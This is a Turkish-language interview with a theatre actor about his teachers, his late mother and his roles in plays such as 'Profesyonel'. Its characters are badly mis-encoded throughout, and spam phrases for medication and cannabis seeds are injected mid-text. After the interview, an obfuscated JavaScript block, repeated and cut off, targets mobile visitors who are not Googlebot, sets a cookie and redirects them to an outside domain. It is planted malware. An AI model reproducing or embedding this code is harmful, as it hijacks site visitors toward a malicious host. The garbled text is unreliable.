Beni oynuyorsan dahi, sen istediAYin gibi oynamalAi??sAi??n. Ve bir cA?mlesi hep AYiar oldu, hem filmi Ai??alAi??AYAi??rken, hem filmden sonra hayatAi??ma kaldAi??: Yeni olandan, yenilikAi??iden korkmayAi??n, devrimde yeni ve yenilikAi??i olmayan klasikleAYemez.

IMG-20160613-WA0007

Ai??oAYu kez modernlik klasiAYin karAYAi??tAi?? sanAi??lAi??r oysa. Ve evet NazAi??mai??i??a kayAi??tsAi??z kalmak olanaksAi??z.
Ai??lk set zamanlarAi?? bir rAi??portajAi??mda, bu zorluklarAi?? konuAYmusuz bir dergiye. Ben MA?AYfik hocayAi?? anmAi??AYAi??m, onun gAi??sterdiAYi doAYrultuda oyunculuk yapmaya Ai??alAi??AYAi??yorum demiAYim filan. Telefon da Ai??ekmiyordu sette. Deniz kenarAi??na gittim, bir Ai??ay sAi??yledim kendime, yorgunum, birazdan sahnem baAYlayacak. Telefon Ai??aldAi??, annem arAi??yor. O zaman hayattaydAi??, NazAi??mai??i??Ai??n seti bittikten 6-7 ay sonra kaybettik annemi. ai???Yavrum, nasAi??lsAi??n oAYluAYum, iyi misin bitanem?ai???Ai?? ai???Ai??yiyim annecim, hiAi?? merak etme, yoruluyorum ama mutluyum.ai??? ai???Biliyorum oAYlum, rAi??portajAi??nAi?? okudum. Sen nasAi??l bir insansAi??n, seni doAYurduAYum iAi??in o kadar mutluyum kiai??i??ai??? Tarif edemiyor bAi??yle. BoAYazAi?? dA?AYA?mleniyor, benim boAYazAi??m da dA?AYA?mleniyor. ai???Sen NazAi??mai??i??Ai?? ne gA?zel anlattAi??n, ben bu filmin Ai??ok iyi olacaAYAi??ndan, senin Ai??ok iyi oynayacaAYAi??ndan eminim oAYlum. Neden biliyor musun? Sen Ai??A?nkA? MA?AYfik Kenterai??i??i de andAi??n o sAi??yleAYide. Gencecik bir adamAi??n bunu takdir edebilmesi, hocasAi??ndan ilham aldAi??AYAi??nAi??, feyz aldAi??AYAi??nAi?? da bilmesi, ona deAYer vermesi, onuAi?? anlatmasAi?? benim iAi??in Ai??ok deAYerli. Sen Ai??ok iyi bir evlatsAi??n, Ai??ok iyi bir insansAi??n. Allah sonunu benzetmesin ama sana NazAi??mai??i??Ai??n yaAYadAi??AYAi?? gibi bir hayat diliyorumai??? demesi… Sustum, hiAi??bir AYey diyemedim.

Ne kadar yA?rekli bir cA?mle. Siz de ai???BebeAYin anne sA?tA?nA? aradAi??AYAi?? gibi NazAi??m’Ai?? arAi??yoruzai??? diyorsunuz mezarAi??nAi?? ziyaretinizde.
Bravo, bak yine ben hatAi??rlamadAi??m, siz hatAi??rladAi??nAi??z. Ai??A?nkA? saAYlAi??klAi?? bA?yA?mek iAi??in NazAi??mai??i??lara ihtiyacAi??mAi??z var. O bize hayal etmekten vazgeAi??memeyi anlatmaya Ai??alAi??AYAi??yor. Hayallerimin gerAi??ek olup olmayacaAYAi??nAi?? bilmiyorum ama hayal etmeye devam ediyorum.

"MA?fettiAY"
“MA?fettiAY”

BA?lent Emin Yarar ile ilk buluAYmanAi??z ai???MA?fettiAYai??? oyunuyla oluyor. Orada o taklayAi?? atAi??p nasAi??l palto giydiAYinizi anlayamanlar tabii OAYuz Aralai??i??dan pandomimin yanAi??sAi??ra akrobasi dersi aldAi??AYAi??nAi??zAi?? bilmiyorlardAi??r.
Bravo, ne gA?zel andAi??nAi??z. OAYuz Aral karikatA?rist ama bizim iAi??in deAYil. Bizim iAi??in hareket hocamAi??z, akrobasi hocamAi??z. Bize kendi bedenimizi fark ettirdi. ai???Sana sorsam yapamazsAi??n ama ben yapacaAYAi??nAi?? gAi??rA?yorumai??? derdi. Bana, beni fark ettirdi. Her AYeyi yaparsAi??n diyerek baAYladAi?? OAYuz Aral. Sende her AYey var. YAi??netmenim bana AYunu yapar mAi??sAi??n dediAYinde, Ai??nce yapamamdan baAYlamAi??yorum, nasAi??l yaparAi??mdan baAYlAi??yorum. Denemeden bilemezsin. Bize ai???timingai??? denilen AYeyi, ai???zamanlamayAi??ai??? Ai??AYretti. ZamanAi?? bAi??lmeyi, zamanAi??n iAi??inde zaman aAi??mayAi?? Ai??AYretti. Bedenim de, ruhum da bunlardan yola Ai??Ai??ktAi??AYAi?? iAi??in ai???MA?fettiAYai??? oyununda insanlar nasAi??l yapAi??yor diyorlar, saAYolsun hocalarAi??mAi??z iAYte.

Bir de tabii sahnede ufalmayAi?? ai???KanlAi?? DA?AYA?nai???de Ege Aydanai??i??dan Ai??AYreniyorsunuz.
Evet, oyunun yAi??netmeniydi. Ai??ok komikti, ai???Yetkin, arkadaAYAi??nAi??n Ai??nA?nden geAi??me, kapatAi??yorsun.Yetkin, arkadaAYAi??nAi??n arkasAi??na da geAi??me. Arkadan da kapatAi??yorsunai???. Provalarda zaten yerlere yattAi??k.

"Azems Unutma"
“Azems Unutma”

Ai??zen Yula oyunlarAi??nAi??n Ai??okluAYunu fark ediyorum sizde. ai??? Cheap antivert meclizine YakAi??ndoAYu’da Emanetai???, ai???DA?nyanAi??n OrtasAi??nda Bir Yerai???, ai???Azemsai??i?? Unutmaai??i??ai???yAi?? oynuyorsunuz sAi??rasAi??yla. Cannabis seeds ottawa ontario ai???Azems neden bir iz bAi??rakmadan ortadan kayboldu?ai??? sorusu merkezinde bir aile sorgulamasAi?? diyebileceAYiniz oyundan Ai??nce kitabAi?? Ai??Ai??kardAi??AYAi??nda ai???Her hikayenin bir yabancAi??ya ihtiyacAi?? var Yetkin, sevgilerimleai??? diye imzalamAi??AY. Bu da bahtAi??nAi??za gelen bir baAYka oyun.
Evet, oyun gelip beni buluyor. Gel de bahta inanma. Ai??zenai??i??in ayrAi??ca Ai??ykA? gA?nA?nde Ai??eAYitli Ai??ykA?lerini de okudum. Ai??zenai??i??le organik iliAYkilerimiz oldu. BA?tA?n bunlarAi??n Ai??tesinde Ai??ok sevdiAYim bir insan. HayatAi??mAi??n bir parAi??asAi??, Ai??yle hissederim Ai??zenai??i??i. o benim iAi??in Ai??zel Yulaai??i??dAi??r. Zaten derin gAi??rA?nen bir Ai??ocuk, Ai??ok daha derin olduAYunu sAi??yleyebilirim. Ai??ok madenler, Ai??ok cevherler, Ai??ok hayatlar var iAi??inde.

Siz okuldan mezun olurken 1992ai??i??de yazmAi??AY ai???Profesyonelai???oyununu DuAYan KovaAi??eviAi??. BahtAi??nAi??zdaki rolleri bekliyorsunuz ya, iAYte bu da kader. Oyun BA?lent Emin Yararai??i??Ai??n ateAYlemesiyle, IAYAi??l KasapoAYluai??i??ndan sonra gelip sizi buluyor. Siz okumadan varAi??m diyorsunuz.

Profesyonel
Profesyonel

Bennuai??i??nun da katkAi??sAi?? var, o Ai??neriyor. BazAi?? AYeyler tartAi??AYAi??lmaz; BA?lent oynuyor, IAYAi??l yAi??netiyor, iAi??eriAYi sonra konuAYuruz ama bu buluAYmaya hayAi??r denir mi? Niyetim ilk okumalarAi?? A?stA?nkAi??rA? yapAi??p gerAi??ek okumayAi?? birlikte yapmak ekiple. Kafamda ezberci bir yaklaAYAi??m olmasAi??n diye Ai??yle istiyorum. AzAi??yle bir okuma yaptAi??k hep beraber. BaktAi??k, deyim yerindeyse Ai??ok laf, atamazsAi??n, atAi??lmaz. IAYAi??l, Ai??ok prova sevmez, 2-3 provada hadi sahneye der. Biz ileri geri, ileri geri, oyunu baAYlatAi??yoruz, bir yere kadar gidiyoruz, -oyunu Ai??ok sevdik, anlattAi??AYAi?? AYeye bayAi??ldAi??k- Ai??ama layAi??k olamAi??yoruz. HayAi??r, anlatamAi??yoruz adamAi??n derdini. ai???Ya, AYAi??yle diyor, anlAi??yorum ama yapamAi??yorum, Ai??zA?r dilerimai??? diyorum. ai???Ben deai??? diyor BA?lent, ai???Orada bir duruAYu var, onu Ai??Ai??karamAi??yoruzai??? diyor. Bir sonraki sahneye geAi??emiyoruz. Sonra IAYAi??lai??i??a bakAi??yoruz, ai???ne dersinai??? diyoruz.ai??? Lahmacun yer misiniz?ai??? diyor. Eyvah, demek ki lahmacunluk oynamAi??AYAi??z! Olmuyor, olmuyor, BA?lent bir ara baAYAi??rdAi?? IAYAi??lai??i??a, ai???Ama sen de hiAi??bir AYey sAi??ylemiyorsunai??? dedi. O da ai???E, ne sAi??yleyeyim, oynayAi??nca oluyorai??? dedi. Bu kadar basit. Ben dinlemek istiyorum diyor IAYAi??l. Dinlemeyi bilmiyoruz ya, dinleyebilmek maharet. Biz dedik ki BA?lentai??i??le, ai???biz yazarAi?? dinlemiyoruzai???. Biz illA? yorum yapAi??yoruz, metne ve hikayeye sadakat derdindeyiz. Metnin kelimelerle aynen sAi??ylenmesinden bahsetmiyorum. Bazen sadakatten dolayAi?? bazAi?? AYeyleri eyip bA?kmek bile mA?mkA?ndA?r. Hepimiz manA?nAi??n aracAi??sAi??yAi??z Ai??A?nkA?. SAi??zcA?kler de ona oracAi??, bedenler de ona aracAi??, oyuncu nesnesi de ona aracAi??. Bir genel prova yaptAi??k. Oyun bitti, tabii alkAi??AY yok, gerAi??i genel provada alkAi??AY beklemiyoruz amaai??i?? Duygusu kAi??tA?. PrAi??miyerden sonra diplomalarAi?? asarAi??z herhalde bir yere dedik. Meslek hayatAi??mAi??zAi??n sonu dedik. Bizden oyuncu olur mu falan dedik yani. YalnAi??z olsam vehmediyorum diyeceAYim ama BA?lentai??i??i de gAi??rdA?m orada. MeAYer yazar onu da yazmAi??AY. Oyunun gerAi??ek seyirciye ihtiyacAi?? var. AnlatAi??lacak, paylaAYAi??lacak kiAYiye de ihtiyacAi?? var. Ordan dolayAi?? senin de fark etmene, soyunmana ihtiyacAi?? var. O fark ediAY anlarAi?? Ai??ok deAYerli. Ve BA?lentai??i??le birbirimize ai???sAi??z verai??? demeden verdiAYimiz bir sAi??z var. SAi??zA?mA?z AYu: En Ai??ok tiyatronun ve MA?AYfik hocanAi??n bizden istediAYi AYey: ai???Sahi olun, samimi olunai???un ta kendisidir. Ai??Ai??inden geAi??tiAYimiz, hikayenin ta kendisidir Ai??A?nkA?.Yazar bunu yaptAi??AYAi?? iAi??in zaten Ai??ok baAYarAi??lAi?? reaksiyon alAi??yor. Ai??Bu oyununda, Ai??zellikle tiyatronun biAi??imine bir Ai??nerme getiriyor. Seyirciye interaktif dediAYimiz anlatAi??lan oyunun sonunda ortaya Ai??Ai??kan AYu Ai??nA?mA?zde duran kayAi??t cihazAi??yla birlikte bir oyun armaAYan ediyor. Hem Luka Teoai??i??ya oyun armaAYan ediyor, -kendi hayatAi??nAi??n iAi??inden geAi??tiAYi bir oyun- hem de seyirciye bir oyun armaAYan ediyor. Ai??A?nkA? kendini kayda geAi??irip dinleme cesaretinde bulunduAYu iAi??in bu kadar gA?zel yazmAi??AY. Ai??zeleAYtiri yapmAi??AY DuAYan KovaAi??eviAi??.

Birey ve sistemin karAYAi??tlAi??AYAi??ndan bahsedebiliriz sanAi??rAi??m. ai???Oyunda iAYleyen bir sistem var ve siz ya onun bir parAi??asAi?? olmayAi?? tercih edeceksiniz ya da karAYAi?? Ai??Ai??kAi??yorsanAi??z susmayAi?? bileceksiniz. ai???Bireylerin bilgi ve yetkinlikle deAYil, yAi??neticilere kAi??rA? kAi??rA?ne baAYlAi??lAi??k ve kAi??Ai?? yalamayla bir yere gelmeleriniai??? sAi??ylemesi iAYte bugA?nA?n TA?rkiyeai??i??si.
Teoai??i??nun cevabAi?? var. ai???Ama Ai??yle deAYil, ben Ai??yle deAYil, ama, amaai??i??ai??? Bunlar palavra. YAi??kAi??lAi??yor orada aslAi??nda. AyaklarAi??m yerden kesiliyor, oyunda da Ai??yle. DA?n eleAYtirdiAYimiz AYey, bugA?n tebasAi?? olduAYumuz AYey olabilir. Sistem dediAYin AYey ne ki Ai??zA?nde diyor. Bu oyun onun iAi??in bugA?n, TA?rkiyeai??i??nin her yerinde; Ai??stanbulai??i??unda da, Ai??orumai??i??un da da, DiyarbakAi??rai??i??Ai??nda da aynAi?? uyaranAi?? yapAi??yor. Her zaman iktidar denen bir AYey var. Ya onun neferisin ya da onun dA?AYmanAi??sAi??n. Suyuna gidersen, Ai??ok gA?zel, sAi??rtAi??nAi?? sAi??vazlAi??yorlar, sana yer aAi??Ai??yor. KarAYAi?? Ai??Ai??karsan, sus diyor, elini aAYzAi??na gAi??tA?rA?yor, kapatAi??yor. Daha da konuAYursan, dAi??AYarAi?? atAi??yor. Devam edersen dAi??AYardan konuAYmaya, sistem yok ediyor. Bence herkes bu yA?zden A?rperiyor. Bu oyunu anti-komA?nist olarak deAYerlendirenler oldu. BA?yA?k yanAi??lgAi??. Ai??AYte yine dar kalAi??p bakma biAi??imleri bunlar. John Bergerai??i??in affAi??na sAi??AYAi??narak ai???bakma biAi??imleriai??i?? diyeceAYim. GAi??rmeye Ai??alAi??AYmak yok. A?lkede her AYeye bakAi??yoruz ya. Olup bitene, gelip geAi??ene, inAYaata, Ai??lA?mlere bakAi??yoruz. Kendimize de bakAi??yoruz. Kendine iyi bak TA?rkiye.

Demek ki tiyatro, gitmeyene Ai??lA?yormuAY. En iyi cevap ise, iAYini en iyi AYekilde yapmaya devam etmek. GA?cA?mA?z bu.
Ai??ok doAYru, kesinlikle. YaptAi??AYAi??m neye deAYiyor diyor insan. HayAi??r, olmaya devam ediyor. Ben olmaya devam ediyorum. Azu ben olsaydAi??m lafAi?? var ya. Ai??nce bir sen olsaydAi??n kardeAYim, onu konuAYabilirdik. KarAYAi??mda sen yok ki, karAYAi??mda baAYkalarAi?? var, ezberler var, kliAYeler var, Ai??oAYunluk var. onlarAi??n sAi??ylemi var ama sen yoksun. Az olmak deAYerlidir.

Oyunda Luka Laban sAi??ylA?yor; ai???Ya onlara karAYAi?? olduAYunu sanarak onlardansAi??n ya da sahiden onlara karAYAi??sAi??ndAi??r.ai??i?? Her durumda sistem dAi??AYAi??nda kalAi??yoruz aslAi??nda. SAi??zkonusu akAi??mAi??n iyi olduAYunu savunan ve ona hizmet eden biriyseniz de gA?nA?n birinde o sistem Ai??Ai??ktA?AYA?nde siz yine dAi??AYAi??nda kalmAi??AY olursunuz ve size dA?AYen sadece yA?zleAYmektir. Bertol Brechtai??i??in bir sAi??zA? vardAi??r; ai???HaksAi??zlAi??AYa karAYAi?? baAYAi??rmak sesini Ai??irkinleAYtirir insanAi??n, Ai??fkelenmek yA?zA?nA?ai???.
SukAi??net iyidir diye dA?AYA?nA?yorum. MA?sadenizle 1999 deprmindeki AKUT Ai??rneAYini vermek istiyorum. Bir amca, enkazdaki kAi??zAi??nAi?? Ai??Ai??karsAi??nlar diye AKUTai??i??u oraya Ai??aAYAi??rAi??yor. Onlar ise baAYka bir enkazAi??n baAYAi??ndalar. ai???Oraya gelemeyiz, Ai??ok tehlikeliai??? diyorlar. Amca da, ai???e sizin iAYiniz tehlike deAYil mi, can kurtarmak iAi??in gelmediniz miai??? diyor. Onlar da ai???Evet amca ama can kurtarmak iAi??in hayatta kalmaya devam etmeye Ai??alAi??AYAi??yoruz.ai??? diyorlar. SukAi??net dediAYim de o. Ai??nsanoAYlu evrimini tamamlamadAi?? fakat en azAi??ndan prangalarAi??mAi??zdan kurtulmak mA?mkA?n diye dA?AYA?nA?yorum. En baAYa dAi??nA?yorum, bunlarAi??n tek Ai??aresi de ai???kendiai??? olan bir AYey inAYaa edebilmek. Ai??zgA?n, eAYAYiz, ai???uniqueai???, tekrarlanamaz farklAi??lAi??klarAi??mAi??zla aynAi??laAYalAi??m ve farklAi??lAi??klarAi??n deAYerli olduAYu bir dA?nya Ai??ngAi??relim. Onun peAYinde olalAi??m. Benzetmeye Ai??alAi??AYarak deAYil. Her anlamAi??yla.

Sizi tanAi??mak, dayatmalardan, saAi??malAi??klardan, Ai??irkinliklerden kuytunuza sAi??AYAi??narak kurtulmak gibiydi, Ai??ok gA?zeldi. TeAYekkA?r ederim. Ai??Ai??imin sesi susmuyor.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g 